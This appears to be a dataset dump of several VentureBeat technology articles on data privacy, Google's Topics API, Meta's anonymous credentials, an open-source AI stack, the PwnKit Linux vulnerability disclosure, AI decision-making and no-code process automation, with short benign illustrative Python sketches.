Most people do not currently see a problem with their data being spread all over the place, and are generally unaware of the privacy concerns this situation raises. However, identity theft is notably on the rise for individuals, as are data exfiltration and man-in-the-middle (MitM) attacks for organizations. Both are the result of exploiting vulnerabilities to compromise personal data and breach confidentiality, and both can be prevented or mitigated by judicious application of data protection principles.

Data: It’s personal

Personal data is a subset of data that relates to individuals. It has been in the spotlight since the advent of the GDPR in 2018. Since then, other pieces of legislation have been adopted across the globe, including in China (PIPL), Brazil (LGPD), and California (CCPA). These legislative efforts share one common objective: to provide a framework to protect personal data. The GDPR defines personal data as “any information relating to an identified or identifiable natural person (‘data subject’); an identifiable natural person is one who can be identified, directly or indirectly, in particular by reference to an identifier such as a name, an identification number, location data, an online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of that natural person.” This concept of personal data, understood in a broad sense, is shared across the aforementioned laws.
Given that most of these laws have provisions for cross-border transfers, chances are your organization falls within the scope of one jurisdiction or another when it comes to the processing and protection of personal data. Examples of personal data include names, identification numbers, location data, and online identifiers.

Definition differences: PII and personal data are not the same

One word of caution: although often erroneously used interchangeably, Personally Identifiable Information (PII) and personal data are not the same. Personal data also encompasses information that can point indirectly to an individual, whereas PII, a term mostly used in the U.S., is narrower and points directly to an individual. For instance, “the red-haired woman who sat by the window” could constitute personal data if it helps identify a single person. Notice how, in this example, there is probably no need to obtain a name or a number. Some ambiguity is at play, though, which is largely dependent on context. Context in this sense combines different data items like pieces of a puzzle: information from different sources can be aggregated in such a way as to make an inference. Another example of the role context plays is a random sequence of digits, which is not personal data unless those digits form an individual’s telephone number and the connection between the individual and the number can be established. It follows that any PII can be considered personal data, but not vice versa.

Data vs. personal data vs. special categories of data

We have seen how data differs from personal data, but there is another important data type: special category data.
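The role context plays in indirect identification can be made concrete with a small, entirely hypothetical linkage sketch: neither record set below contains a direct identifier on its own, yet combining quasi-identifiers (hair color and seat preference) singles out one person. All names and fields are invented for illustration.

```python
# Hypothetical records: neither source alone names the observed individual.
seating_log = [
    {"seat": "window", "hair": "red", "time": "09:00"},
    {"seat": "aisle", "hair": "brown", "time": "09:00"},
]
loyalty_cards = [
    {"name": "A. Smith", "hair": "red", "usual_seat": "window"},
    {"name": "B. Jones", "hair": "brown", "usual_seat": "aisle"},
]

def link(observation, directory):
    """Infer an identity by matching quasi-identifiers across sources."""
    matches = [p["name"] for p in directory
               if p["hair"] == observation["hair"]
               and p["usual_seat"] == observation["seat"]]
    # Identification succeeds only if the combination is unique in context.
    return matches[0] if len(matches) == 1 else None

who = link(seating_log[0], loyalty_cards)
```

Here the “red-haired woman who sat by the window” resolves to a name, so both records constitute personal data; with a non-unique or absent combination, `link` returns `None` and no identification takes place.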
These three types can be represented as nested sets: special category data is a subset of personal data, which in turn is a subset of data. Unlike personal data, special category data is clearly defined in a prescriptive manner under Article 9 of the GDPR, and consists of: data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs, or trade union membership; genetic data; biometric data processed to uniquely identify a person; health data; and data concerning a person’s sex life or sexual orientation.

Data mapping and data classification

It is critical to know the personal data your organization handles and to map how that personal data is processed, stored, transmitted, and ultimately deleted. This will help you adapt your organizational and technical measures to protect personal data according to its associated risk, and to prioritize wisely. This can be achieved in one of two ways:

- Performing a data inventory, which consists of creating a record of the data that enters, resides in, or exits your organization
- Performing a Record of Processing Activities (RoPA), which is similar to a data inventory but focuses on the activities (read: flows of data) rather than specifying each data element. It suggests a lesser effort, but by no means a negligible one.

Data classification will categorize the data into several compartments. For commercial organizations, a typical classification scheme is composed of:

- strictly confidential
- confidential
- personal
- internal use only
- public

These can be considered two sides of the same coin, as a data inventory/RoPA without data classification is not particularly useful, and data classification without a data inventory/RoPA simply cannot take place.

Where to find personal data

To support your search for personal data, it is a good idea to have an asset inventory first; that way it becomes easier to determine the data that may be circulating through those assets. Regardless, here are some locations to examine:

- Personal data can be in digital form or in physical form as part of a filing system.
- Personal data can be found in structured or unstructured databases.
- Data lakes and data warehouses often have copious amounts of personal data.
- Web forms used on your website or in any other method of communicating with your customers
- Cookies and related technologies deployed on your website, particularly those set by third parties
- Shared drives used internally, particularly those accessible to external parties
- Email inboxes
- Bring Your Own Device (BYOD) phones, including the SIM card and internal memory
- Removable media such as USB drives, CDs, and DVDs
- Dormant accounts, with usernames and other data
- HR records
- Accident books containing health-related data

As part of digitalization, I have seen many organizations struggle with data previously (or concurrently) stored in physical form. Filing cabinets used to store all sorts of paper documents, including passport scans, are still quite common in office environments. Their bigger brother is the “data vault,” an entire room dedicated to storing printouts. These pose a high, and largely unknown, risk to the organization, as the data is normally just dumped there without any form of consideration. The amount of effort and time required to categorize these documents can be daunting, and the process is prone to errors if attempted using a “speedy” approach. Tools exist to aid with the data discovery exercise, but a good policy needs to be in place to ensure newly acquired data is appropriately labeled and safely stored.

This looks like a lot of effort. Why bother?

The consequences of not protecting personal data, which as we have seen requires knowing where the data is and what it is, could be severe. If an event were to occur, a security incident involving personal data constitutes a data breach, and may mandate notification and reporting to supervisory authorities and data subjects, depending on the extent of the breach. Although personal data is pervasive and perceived as a commodity, it has been elevated by data protection laws worldwide to something that needs to be handled with care.
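A data inventory combined with the classification scheme described above might be sketched as follows. This is a toy illustration with invented asset names and fields, not a substitute for a proper inventory or RoPA exercise.

```python
# Classification scheme from the article, ordered strictest to most open.
CLASSIFICATION_LEVELS = [
    "strictly confidential", "confidential", "personal",
    "internal use only", "public",
]

# Minimal inventory: one record per asset that holds data.
inventory = [
    {"asset": "hr_records_db", "fields": ["name", "salary", "health_note"],
     "classification": "strictly confidential", "location": "on-prem"},
    {"asset": "marketing_site", "fields": ["page_views"],
     "classification": "public", "location": "cloud"},
    {"asset": "crm", "fields": ["name", "email"],
     "classification": "personal", "location": "cloud"},
]

def validate(inv):
    """Return assets whose label is not a recognized classification level."""
    return [a["asset"] for a in inv
            if a["classification"] not in CLASSIFICATION_LEVELS]

def assets_with_personal_data(inv):
    """Assets classified 'personal' or stricter: candidates for RoPA coverage."""
    strict = set(CLASSIFICATION_LEVELS[:3])
    return [a["asset"] for a in inv if a["classification"] in strict]
```

Even this tiny sketch shows why the two exercises are “two sides of the same coin”: the inventory tells you where data lives, and the classification tells you how carefully each location must be protected.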
Organizations must be aware of applicable laws and act in accordance with them to avoid nasty surprises that may impact their business objectives.

Anselmo Diaz is an experienced principal consultant and associate lecturer with an extensive academic background in law, information security, and engineering, including globally recognized certifications such as Fellow of Information Privacy (FIP), CIPP/E, CIPM, CIPT, CDPSE, and CISSP. "
15,129
2,022
"Google Privacy Sandbox Initiative ushers in interest-based advertising with Topics API | VentureBeat"
"https://venturebeat.com/2022/01/25/google-privacy-sandbox-initiative-ushers-in-interest-based-advertising-with-topics-api"
"Google Privacy Sandbox Initiative ushers in interest-based advertising with Topics API

[Photo caption: The brand logo of Alphabet Inc's Google is seen outside the company's office in Beijing, China, August 8, 2018. Picture taken with a fisheye lens. REUTERS/Thomas Peter]

Today, Google’s Privacy Sandbox initiative, which is designed to improve web privacy for users, announced the launch of the Topics API for interest-based advertising. The API enables a user’s web browser to analyze their browsing history and determine which topics represent their top interests. Then, when the user visits a website, the Topics API will select three of those topics to share with the site and its advertising partners.
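The selection mechanism described above (topics derived per time period, or “epoch,” from browsing history, with a handful shared per site) can be simulated in rough outline. This is a hedged sketch, not Google’s implementation: the real API is exposed to JavaScript as `document.browsingTopics()`, and the taxonomy, hostnames, and selection details below are invented for illustration.

```python
import random
from collections import Counter

# Hypothetical mapping of visited hostnames to taxonomy topics.
SITE_TOPICS = {
    "sneakerblog.example": "Shoes",
    "caraudio.example": "Autos",
    "tastyrecipes.example": "Food",
    "marathonnews.example": "Fitness",
}

def epoch_top_topics(history, k=5):
    """Derive the user's top-k topics for one epoch from their history."""
    counts = Counter(SITE_TOPICS[h] for h in history if h in SITE_TOPICS)
    return [topic for topic, _ in counts.most_common(k)]

def topics_for_site(epochs, rng, n=3):
    """Share one topic from each of the last n epochs with a calling site."""
    return [rng.choice(epoch) for epoch in epochs[-n:] if epoch]

# Three weekly epochs of (invented) browsing history.
epochs = [epoch_top_topics(h) for h in [
    ["sneakerblog.example", "sneakerblog.example", "caraudio.example"],
    ["tastyrecipes.example"],
    ["marathonnews.example", "sneakerblog.example"],
]]
shared = topics_for_site(epochs, random.Random(0))
```

The sketch mirrors the privacy property the article describes: a site receives three coarse topic labels rather than the raw browsing history that produced them, and older epochs simply age out.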
The web browser can only store topics for a maximum of three weeks, and Google Chrome users will have the option to view the topics associated with them, remove them, or disable the feature completely. The announcement comes ahead of Google’s plan to phase out third-party cookies in Chrome, and will give consumers greater control over their data by storing it on their local device, while still ensuring that advertisers have access to sufficient information to deliver a relevant experience. As a result, after years of using third-party cookies to track visitors and collect data for targeted ads, technical decision-makers and organizations will need to gather insights from the interests the Topics API surfaces if they want to effectively promote products and services to Chrome users.

Moving away from third-party cookies to interest-based advertising

The announcement comes amid consumer concerns over how marketers use their data. Last year, a poll found that 55% of Americans say they are not very, or at all, comfortable sharing their personal data in exchange for a better website experience, with 37% saying they are very concerned about how websites use their personal data. The Google Privacy Sandbox initiative, and now the Topics API, aim to address these challenges by giving consumers more control over what information they share with advertisers, so they can better maintain their privacy online.

“Our vision for the Privacy Sandbox hasn’t changed. We want to enable a sustainable advertising ecosystem for the open web with strong privacy protections for users.
This vision has the greatest chance of success if we work with the ads ecosystem to make this fundamental shift in manageable stages, introducing new technologies that can replace cross-site tracking methods, learning what works and where we can make improvements, and enforcing stronger privacy protections over time,” a spokesperson for Google commented.

Topics attempts to offer less intrusive data collection for advertisers

The Topics API stands as a solution alongside the adtech software market, which was valued at $16.27 billion in 2018 and is projected to reach $29.85 billion by 2026. While third-party cookies are the Topics API’s main competitor, as they are phased out, device or browser fingerprinting will become its main alternative. Many organizations use device fingerprinting to identify devices or browsers and gather information about users, including browser version, operating system, active plugins, and language, as well as how they browse through the site. While device fingerprinting is a useful technique for enterprises to identify users on new or old devices and target them with relevant offers or services, the information it gathers on users is also quite invasive and extensive.

Topics gives advertisers and organizations actionable information, letting them see the topics users are interested in, but protects user privacy by preventing direct access to browsing history, the websites users have visited, and their behavior on other sites.
"
15,130
2,022
"Meta says its Anonymous Credentials Service (ACS) will help reduce data collection activities | VentureBeat"
"https://venturebeat.com/2022/03/30/meta-says-its-anonymous-credentials-service-acs-will-help-reduce-data-collection-activities"
"Meta says its Anonymous Credentials Service (ACS) will help reduce data collection activities

Today, Meta engineers delivered a talk as part of the Systems@Scale virtual event detailing the organization’s approach to data minimization, elaborating on an internal solution it has developed called the Anonymous Credentials Service (ACS). Meta’s ACS is designed to enable it to authenticate users in a “de-identified manner,” permitting access to services without gathering any data that could be used to reveal the subject’s identity. Under the ACS, a client contacts the server through an authenticated channel and sends a token, which the server signs and sends back. Then the client uses an anonymous channel to submit data to the server and authenticates it using a modified form of the token rather than the user’s ID.
This allows servers to authenticate clients without knowing which client a token belongs to.

The organization’s approach highlights a potential alternative for enterprises and technical decision-makers who are looking at techniques for minimizing the amount of data they collect.

The need to de-identify data

Meta’s ACS comes as data privacy regulations mount across the globe, and as the organization has come under fire under the GDPR for transatlantic data sharing, with the company recently warning that it might have to pull Facebook and Instagram from Europe if the GDPR prevented sharing user data from the U.S. to the EU. “We have absolutely no desire and no plans to withdraw from Europe, but the simple reality is that Meta, and many other businesses, organizations and services, rely on data transfers between the E.U. and the U.S. in order to operate global services,” a Meta spokesperson said.

For any organization doing business, there is a need to collect the minimum amount of data required, to prevent personally identifiable information from falling into the wrong hands. Meta’s development of the ACS provides a new technique that the organization can use to authenticate users and ensure the security of key services while decoupling their identities from personally identifiable information. “Collecting the minimum amount of data required to support our services is one of our core principles at Meta as we continue developing new privacy enhancing technologies (PETs). We are constantly seeking ways to improve privacy and protect user data on our family of products,” said Meta software engineers Shiv Kushwah and Haozhi Xiong in the official blog post.

The ACS provides a way to keep protected information private while ensuring that the organization has enough data to perform its critical tasks.
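The issue-and-redeem flow described above can be sketched in miniature. This toy uses a plain HMAC, so, unlike a real anonymous credential scheme, the server could still link issuance to redemption by remembering tokens; production designs (including the “modified form of the token” the article mentions) rely on blinding techniques such as blind signatures or verifiable oblivious PRFs so that no such link exists. Everything below is an invented illustration, not Meta’s implementation.

```python
import hashlib
import hmac
import os

SERVER_KEY = os.urandom(32)  # server-side signing key, never shared

def issue(token: bytes) -> bytes:
    """Authenticated channel: the server signs the client's token."""
    return hmac.new(SERVER_KEY, token, hashlib.sha256).digest()

def redeem(token: bytes, signature: bytes) -> bool:
    """Anonymous channel: the server checks the signature, not a user ID."""
    expected = hmac.new(SERVER_KEY, token, hashlib.sha256).digest()
    return hmac.compare_digest(expected, signature)

# Client side: obtain a credential while logged in...
token = os.urandom(16)
sig = issue(token)
# ...then later submit data anonymously, proving only authorization.
is_valid = redeem(token, sig)
is_forged = redeem(token, b"\x00" * 32)
```

The key property being approximated: at redemption time the server learns only that some authorized client is talking to it, which is exactly the decoupling of identity from authorization that the ACS is built for.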
“So, we leveraged the ‘anonymous credential’ collaboratively designed over the years between industry and academia to create a core service called Anonymous Credentials Service (ACS). ACS is a highly available, multi-tenant service that allows clients to authenticate in a de-identified manner. It enhances privacy and security while also being compute-conscious. ACS is one of the newest additions to our PETs portfolio and is currently in use across several high-volume use cases at Meta,” Kushwah and Xiong said.

The trials and tribulations of data protection

Meta’s engineering talk comes as the data protection market is in a state of growth, with the market anticipated to expand considerably by 2027 as the volume of data increases alongside government regulations implementing new data protection standards. Among social media companies there is certainly a need for innovation regarding data protection, with Twitter incurring a €450,000 (roughly $500,000) fine from the Irish Data Protection Commission for GDPR violations following a 2019 data breach. Likewise, TikTok has made costly mistakes regarding data management: in July last year, the Dutch Data Protection Authority (DPA) imposed a fine of €750,000 (roughly $840,000) for violating the privacy of children by failing to offer its privacy statement in Dutch.

Currently, Meta is aiming to differentiate itself from other social media providers by developing a new solution for sharing data that ensures data can be leveraged without exposing any personal information to regulatory liabilities or threat actors.
"
15,131
2,021
"Open source AI stack is ready for its moment | VentureBeat"
"https://venturebeat.com/2021/04/27/open-source-ai-stack-is-ready-for-its-moment"
"Open source AI stack is ready for its moment

Open source stacks enabled software to eat the world. Now several innovative companies are working to build a similar open source software stack for AI development. Dan Jeffries was there when the LAMP stack kicked this off. LAMP is an acronym for the key technologies first used in open source software development: Linux, Apache, MySQL, and PHP. These technologies were once hotly debated, but today they are so successful that the LAMP stack has become ubiquitous, invisible, and boring. AI, on the other hand, is hotter than ever. Much as the LAMP stack turned software development into a commodity and made it a bit boring, especially if you’re not a professional developer, a successful AI software stack should turn AI into a commodity — and make it a little boring too.
That is precisely what Jeffries is setting out to do with the AI Infrastructure Alliance (AIIA).

Innovation, and where it’s at

Jeffries wears many hats. His main role, in theory at least, is chief technical evangelist at data science platform Pachyderm. Jeffries also describes himself as an author, futurist, engineer, systems architect, public speaker, and pro blogger. It’s the confluence of all those things that led him to start the AIIA. The AI Infrastructure Alliance’s mission is to bring together the tools data scientists and data engineers need to build a robust, scalable, end-to-end, enterprise artificial intelligence and machine learning (AI/ML) platform. This sounds like such an obvious goal — one that would be so beneficial to so many — that you’d think somebody would have done it already. But asking why we’re not there yet is the first step toward actually getting there.

Vendor lock-in is a reason, but not the only one. Vendor lock-in, after all, is becoming increasingly less relevant in a cloud-first, open source-first world, although technology business moats live on in different ways. Jeffries was surprised that he did not see an organization actually trying to capture the energy around AI activity, bring different companies together, and get their integration teams talking to each other. “Every founder and every engineer I ended up talking to was very excited. I really didn’t have to work very hard to get people interested in the concept. They understood it intuitively, and they realized that the innovation is coming from these small to mid-sized companies,” Jeffries said. “They are getting funded now, and they’re up against giant, vertically integrated plays like SageMaker from Amazon.
But I don’t think any of the innovation is coming from that space.”

Having spent more than 11 years of his 20-year career at Red Hat, Jeffries recalls how the proprietary software companies used to come up with all the ideas, and then open source would copy them “in a kind of OK way.” But over time, most of the innovation started flowing to open source and to the smaller companies’ projects, he said.

An open source AI stack for the future

The Amazons of the world have their place, as the cloud is where most AI workloads run. Big vertically integrated proprietary systems serve their own purpose, and they’re always going to make money. But the difference is that Kubernetes and Docker don’t become Kubernetes and Docker if they only run on Google, Jeffries said. Innovation is going to come from a bunch of these companies working like little Lego pieces that we stack together, he added. That’s precisely what the AIIA is working on.

So, when can we expect to have a LAMP stack for AI? In all likelihood, not very soon, which brings us to the other key reason this has not happened yet. Jeffries expects a LAMP stack, or a MEAN stack, for AI and ML to emerge in the next five to 10 years and to change over time. The LAMP stack itself is kind of passé now. In fact, the cool dev kids these days are all about the MEAN stack, which includes MongoDB, ExpressJS, AngularJS, and NodeJS. Jeffries has described these as canonical stacks, which arise with greater and greater frequency “as organizations look to solve the same super challenging problems.”

The kind of momentum that happened with LAMP will occur in the ML space, Jeffries suggested. But he warned against believing that anyone has an end-to-end ML system at this point. This can’t be true because the sector is moving too fast. The space itself and the problems to solve are shifting as the software is being created. That makes sense, but then the question is — what exactly is the AIIA doing at this point?
And what does the fact that its ranks include some of the most innovative startups in this space, alongside the likes of Canonical and NewRelic, actually mean? Now some innovators are working to build an open source stack specifically for AI. Enthusiasm is good, but there’s a gap between saying “Hey, that sounds like a good idea, sign me up” and actually coming up with a plan to make it happen. So how are the AIIA and Jeffries going to pull it off? As a writer, Jeffries used George R.R. Martin’s metaphor of gardeners and architects to explain how he sees the evolution of AIIA over time. Architects plan and execute; gardeners plant seeds and nurture them. Jeffries identifies as a gardener and sees a lot of the people in the organization as gardeners. He thinks it’s necessary at this phase and envisions the AIIA evolving over time. Right now, the idea is to get people talking at a lot of different levels, rather than working in their own little silos. Micro-alliances are fair game though: “If you look at 30 logos on the website, you’re not going to build an ML stack with all 30 of those things,” Jeffries said. A concern is the fact that building bridges, and communities, takes time and energy. But Jeffries is enthusiastic about the prospect of helping shape what he sees as the AI revolution, is inspired by the open source ethos, and has the leeway from Pachyderm to run with his ideas. Work, boring work, and AI That seems to be what he’s doing with AIIA. Currently, he’s working on turning the AIIA into a foundation, and he’s also in talks with the Linux Foundation. The goal is to get to the point of bringing in some revenue. Jeffries is working on finances and a governance structure for the AIIA. “You get people who are just firmly focused on this, and it becomes a balance of volunteer efforts and people paid to work on different aspects. The next step really is a lot of logistical work — the boring stuff,” Jeffries said. 
Another metaphor Jeffries uses is that of a strategic board game, where you have to think about everything that can go wrong in advance — a bit like a reverse architect. Inevitably, there is going to be at least some amount of boring work, and somebody needs to do it. But for Jeffries, it’s all worth it. “When I look at AI at this point, I think very few people understand just how important it’s going to be. And I think they have an inkling of it, but it’s usually a fear-based kind of thing,” he said. “They don’t understand fully that in the future, there are two kinds of jobs: one done by AI, and one assisted by AI.” Isn’t it actually three types of jobs, as someone has to build the AI? The people building AI are going to be assisted by AI, so that falls into the second category, Jeffries said. There’s a creative aspect, as someone has to come up with an algorithm. But things like hyper-parameter tuning are already being automated, he added. Jeffries waxed poetic about how “the boring stuff” will be done by AI so people can move up the stack and do more interesting things. Even the creative parts will be a co-creative process between people and AI, in Jeffries’ view. As for the “AI destroys all the jobs” narrative, we’ve heard this one before, but the previous industrial revolutions worked out fine, Jeffries argued. Same goes for the argument that the pace of innovation is so rapid that we don’t have time to create jobs to replace those that are going to be displaced. What even an AI optimist like Jeffries can’t easily dismiss is the fact that innovation may not necessarily be coming from the Big Tech companies, but this is where the data is. This creates a reinforcement loop, where more data begets more AI leading to more data, and so on. Jeffries acknowledges data as a legitimate moat. But he believes ML is progressing in ways that make the dependency on data less vital, such as few-shot learning and transfer learning. 
This, and the fact that the amount of data the world is creating is not getting any smaller, may spur change. What seems inevitable, however, is the need to do lots of work, often boring work, to be able to chase dreams of creativity. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,132
2,022
"Linux vulnerability can be 'easily exploited' for local privilege escalation, researchers say | VentureBeat"
"https://venturebeat.com/2022/01/25/linux-vulnerability-can-be-easily-exploited-for-local-privilege-escalation-researchers-say"
"Linux vulnerability can be ‘easily exploited’ for local privilege escalation, researchers say A newly disclosed vulnerability in a widely installed Linux program can be easily exploited for local privilege escalation, researchers from cyber firm Qualys said today. The memory corruption vulnerability (CVE-2021-4034)—which affects polkit’s pkexec—is not remotely exploitable. However, it can be “quickly” exploited to acquire root privileges, the researchers said in a blog post. “This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration,” the Qualys researchers said in the post. 
In Unix-like operating systems, polkit (formerly known as PolicyKit) is used to control system-wide privileges. Polkit’s pkexec is a program that enables an authorized user to execute commands as a different user. Most Linux distributions affected All versions of pkexec are affected by the vulnerability, and the program is “installed by default on every major Linux distribution,” the Qualys researchers said. The first version of pkexec debuted in May 2009, meaning that the vulnerability—which the researchers dubbed “PwnKit”—has been “hiding in plain sight for 12+ years,” according to the blog post. The researchers said that they’ve “been able to independently verify the vulnerability, develop an exploit, and obtain full root privileges on default installations of Ubuntu, Debian, Fedora, and CentOS.” “Other Linux distributions are likely vulnerable and probably exploitable,” the researchers said. Without a doubt, “any vulnerability that gives root access on a Linux system is bad,” said Yaniv Bar-Dayan, cofounder and CEO at Vulcan Cyber, in an email comment. However, “this vulnerability is a local exploit, which mitigates some risk,” he noted. Disclosure The vulnerability was discovered by the Qualys researchers in November. They reported it to Red Hat, leading up to a coordinated announcement with vendor and open-source distributions today. In the blog post, Qualys researchers said they expect vendors to provide patches for the vulnerability “in the short term.” As of this writing, the Common Vulnerabilities and Exposures (CVE) website did not yet have a listing for CVE-2021-4034. The Qualys researchers said they don’t plan to post exploit code for the flaw. But “given how easy it is to exploit the vulnerability, we anticipate public exploits to become available within a few days,” the researchers said in the blog post. 
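Because the risk hinges on pkexec being a setuid-root binary, one quick way to see whether a host even exposes that configuration is to check the file's set-user-ID bit. A minimal, purely illustrative Python sketch (checking the bit is not a substitute for applying the vendor patch):

```python
import os
import stat

def is_setuid(path):
    """Return True if the file at `path` has the set-user-ID bit set."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)

# On an unpatched default install, /usr/bin/pkexec is typically setuid root,
# which is what makes local privilege escalation possible:
# is_setuid("/usr/bin/pkexec")
```

A commonly suggested stopgap until a fixed package lands has been to strip this bit from pkexec (e.g., with chmod), at the cost of pkexec's normal functionality.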
Spotlight on open source The disclosure comes at a time of particularly high attention on software vulnerabilities, following the reveal of a critical remote code execution flaw in Apache Log4j, a widely used Java logging component, in December. Thanks in large part to the massive response effort from the security community, there have been few cyberattacks of consequence leveraging the Log4j vulnerability, researchers at Sophos said Monday. Like the Log4j vulnerability, the Linux flaw disclosed by Qualys today affects widely used open source systems—making this new vulnerability a “big deal” for the industry, said Bud Broomhead, CEO at Viakoo. “A single open source vulnerability can be present in multiple systems—including proprietary ones—which then requires multiple manufacturers to separately develop, test, and distribute a patch,” Broomhead said in an email comment. “For both the manufacturer, and end user, this adds enormous time and complexity to implementing a security fix for a known vulnerability.” Threat actors, meanwhile, “are betting on some manufacturers being slow in releasing fixes and some end users being slow in updating their devices,” he said. "
15,133
2,022
"How far should AI’s decision-making authority go? | VentureBeat"
"https://venturebeat.com/2022/03/14/how-far-should-ais-decision-making-authority-go"
"How far should AI’s decision-making authority go? Perhaps the leading value proposition for artificial intelligence (AI) is its propensity to help humans make decisions. With the right data and the right analytics, people can choose a course of action based on solid information, not hunches or guesses, and this is expected to bring dramatic improvements to the business model. Elsewhere, however, AI won’t focus on the choices that humans must make, but the ones it will make for itself. In the realm of automation, in particular, AI will be tasked with broad decision-making capabilities — all data-driven, of course — to streamline data flows, improve manufacturing processes, direct traffic and perform a wide range of other functions. This begs the question, where is the line between what AI should decide and what is best left for humans? 
Being careful with autonomous AI Implementing autonomous AI across the full scope of the enterprise data ecosystem – from the data center to the cloud to the edge to connected devices – will require careful coordination between a number of emerging data initiatives. Alan Young, chief product officer at automation firm InRule Technology, recently highlighted the intersection of machine learning (ML), decision automation and process automation and how it will drive better business results. With ML providing the probabilistic decisioning logic and both decision and process automation contributing consistent, orchestrated rules-based governance of operations and behavior, processes gain the ability to act on real-time, dynamic inputs and values without the need for constant, direct human oversight. With this framework in hand, Young says organizations can not only produce more successful outcomes from their data processes, but do so at scale rapidly and consistently. Already, this is evolving beyond a mere competitive advantage to an operational necessity by allowing organizations to detect and respond to both opportunities and threats as they emerge. Still, there is an element of the slippery slope to all of this as AI becomes more infused into the digital universe. As Talend’s Julinda Stefa noted recently, allowing AI to choose your playlist or manage your die-cutting process is one thing, but off-loading decisions on stock trades, healthcare choices and other critical activities is quite another. Unless and until AI is empowered with some degree of humanity, businesses and people should tread carefully as to what it should and should not do. Fortunately, the human touch can be added to AI using three basic techniques: Ensure data quality – not just to detect errors but to ensure data is timely and relevant. 
Make data accessible to all – users should have complete visibility into the data used to train models, and that data should be comprehensive. Prioritize security and compliance – security and privacy policies should be reliably documented, regularly updated and consistently enforced. Clearly, rigorous monitoring of AI decision-making will have to be a top priority going forward, even if the model is aimed at rote, routine tasks. Michael Ross, senior vice president of retail data science at EDITED, offers an example of a retail bot empowered to mark down prices under certain conditions. If, say, at the start of swimwear season, sales of a particular line haven’t hit their targets due to unseasonably cold temperatures, an AI model may execute its logic and put the entire stock on clearance, losing millions of dollars when normal buying patterns resume. The best way to prevent this is to keep humans in the decision-making loop so they can prevent mistakes like these, or correct them quickly if they do happen. What is intelligent automation? What we’re seeing in the integration of AI and automation is the emergence of a new class of platforms called Intelligent Process Automation. In Cognizant’s view, the incorporation of tools like robotics process automation, cognitive technologies, optical character recognition and natural language processing produces a digital Swiss army knife that allows the enterprise to manage its exponential growth, provide clear and consistent results and accelerate business outcomes. Along with this new technology, however, organizations will have to re-orient themselves to the new operational paradigm by addressing gaps in the workforce skillset and overcoming cultural resistance to change. It’s important to remember that intelligent automation should not become an excuse to put systems and processes on autopilot. 
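A human-in-the-loop guard for a markdown bot like the one Ross describes can be sketched in a few lines. This is a toy illustration; the threshold and function names are hypothetical, not EDITED's actual logic:

```python
def markdown_decision(proposed_discount, approval_threshold=0.30):
    """Auto-apply small markdowns; escalate large ones to a human reviewer.

    proposed_discount: fraction of list price to discount (0.10 = 10% off).
    """
    if proposed_discount <= approval_threshold:
        return "auto-approved"
    return "needs human review"
```

Under this sketch, a routine 10% markdown clears automatically, while putting an entire swimwear line on 50% clearance would pause for a merchandiser's sign-off.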
Even as the knowledge workforce evolves from an operational resource to a strategic one, someone still has to keep an eye on how the business is running. And while technology may become empowered to make more, and more important, decisions, it still must answer to someone for its actions – if only to let the good decisions multiply while the bad ones are neutralized. "
15,134
2,021
"Next Matter brings no-code process automation to the U.S. | VentureBeat"
"https://venturebeat.com/2021/02/04/next-matter-brings-no-code-process-automation-to-the-u-s"
"Next Matter brings no-code process automation to the U.S. Next Matter, a no-code business process automation platform based in Germany, has announced plans to enter the U.S. market with the backing of a fresh $4 million in seed funding. Founded out of Berlin in 2018, Next Matter offers a rules-based drag-and-drop platform to help operations teams ditch spreadsheets, emails, and chat apps by building processes that do much of the heavy lifting for them. To do so, Next Matter integrates with myriad third-party enterprise tools, such as Salesforce, HubSpot, Slack, and Zapier, to bridge the interfaces between people, teams, customers, suppliers, and systems that “operations managers struggle with every day,” according to Next Matter CEO and founder Jan Hugenroth. 
“Instead of the countless emails, calls, chats, and spreadsheets required to tell people, teams, customers, suppliers, and systems step by step what to do and when, Next Matter automatically advances operations processes and notifies everyone involved of the work they need to do from start to finish,” Hugenroth told VentureBeat. “No more going back and forth via Slack and email because everyone on every team has what they need when they need it automatically.” Next Matter can be used to build processes for just about any scenario, with a drag-and-drop interface that allows users to stipulate conditions, decision steps, parallel steps, and more. Above: Next Matter: Building a procurement process An example of how operations teams might use Next Matter could involve a catering business such as meal-kit giant HelloFresh, which Next Matter counts as a client. If one of HelloFresh’s business clients needs a vending machine repaired, HelloFresh can set up a workflow so its customer support team files a repair request in their CRM. This could automatically trigger a notification for the machine operations team, which may review it and request more details. Then the field service team responsible for repairs can be automatically notified to schedule a suitable time to visit the premises. Once the repair is booked, Next Matter can automatically generate a slot in the calendar, with necessary details, and send a confirmation to the customer. Other steps in the repair process, including reminders, report filings, and CRM record updates can all be configured so that each step is largely automated, sidestepping countless manual tickets, back-and-forth messages, meetings, and so on. 
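At its core, the repair workflow described above is an ordered list of steps, each owned by a team that gets notified when its turn comes. A toy sketch of that idea follows; this is not Next Matter's actual API, and all step and class names are illustrative:

```python
from dataclasses import dataclass, field

@dataclass
class Workflow:
    """Hypothetical minimal workflow: run steps in order, notifying each owner."""
    steps: list
    log: list = field(default_factory=list)

    def run(self):
        for team, action in self.steps:
            # In a real platform this would be a Slack/email/CRM notification;
            # here we just record who was told to do what.
            self.log.append(f"{team}: {action}")
        return self.log

# The vending-machine repair scenario from the article, as ordered steps:
repair = Workflow(steps=[
    ("customer support", "file repair request in CRM"),
    ("machine operations", "review request, ask for details"),
    ("field service", "schedule on-site visit"),
    ("system", "create calendar slot and confirm with customer"),
])
```

Calling `repair.run()` walks every team through its step without any manual back-and-forth, which is the point of the no-code orchestration the article describes.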
